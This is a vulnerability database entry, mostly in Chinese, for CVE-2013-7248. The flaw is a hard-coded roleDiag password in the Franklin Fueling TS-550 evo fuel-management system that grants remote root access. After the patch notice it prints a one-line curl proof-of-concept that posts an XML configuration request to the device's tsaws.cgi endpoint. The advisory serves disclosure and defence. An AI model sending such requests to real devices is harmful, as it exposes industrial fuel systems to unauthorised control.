Lucene search
RootSSV:61386HistoryFeb 07, 2014 - 12:00 a.m.
Franklin Fueling Systems TS-550 evo 'tsaws.cgi'安全绕过漏洞
2014-02-0700:00:00
Root
www.seebug.org
13
0.01 Low
EPSS
Percentile
83.6%
Bugtraq ID:65041
CVE ID: CVE-2013-7248
Franklin Fueling Systems TS-550 evo是美国富兰克林油系统(Franklin Fueling Systems)公司的一套燃油管理系统,它可通过储罐监控系统全面控制燃油管理,并提供彩色通知和详细标识说明的警报页面功能,迅速获得警报内容。
使用2.0.0.6833和2.3.1.7492版本固件的Franklin Fueling Systems TS-550 evo中存在安全漏洞,该漏洞源于程序对roleDiag账户使用硬编码密码。远程攻击者可利用该获取root权限,可完全控制设备。
0
Franklin Fueling Systems TS-550 evo device Firmware 2.0.0.6833和2.3.1.7492
厂商补丁:
Franklin Fueling Systems
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
Related
nvd
nvd
CVE-2013-7248
2014-01-26 01:55:09
prion
prion
Hardcoded credentials
2014-01-26 01:55:00
cve
cve
CVE-2013-7248
2014-01-26 01:55:09
zdt
zdt
Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities
2014-01-24 00:00:00
Franklin Fueling's T550 Evo Access Control / Credentials
2014-01-23 00:00:00
cvelist
cvelist
CVE-2013-7248
2014-01-26 01:00:00
seebug
seebug
Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities
2014-07-01 00:00:00
packetstorm
packetstorm
Franklin Fueling's T550 Evo Access Control / Credentials
2014-01-21 00:00:00
exploitpack
exploitpack
Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities
2014-01-24 00:00:00
exploitdb
exploitdb
Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities
2014-01-24 00:00:00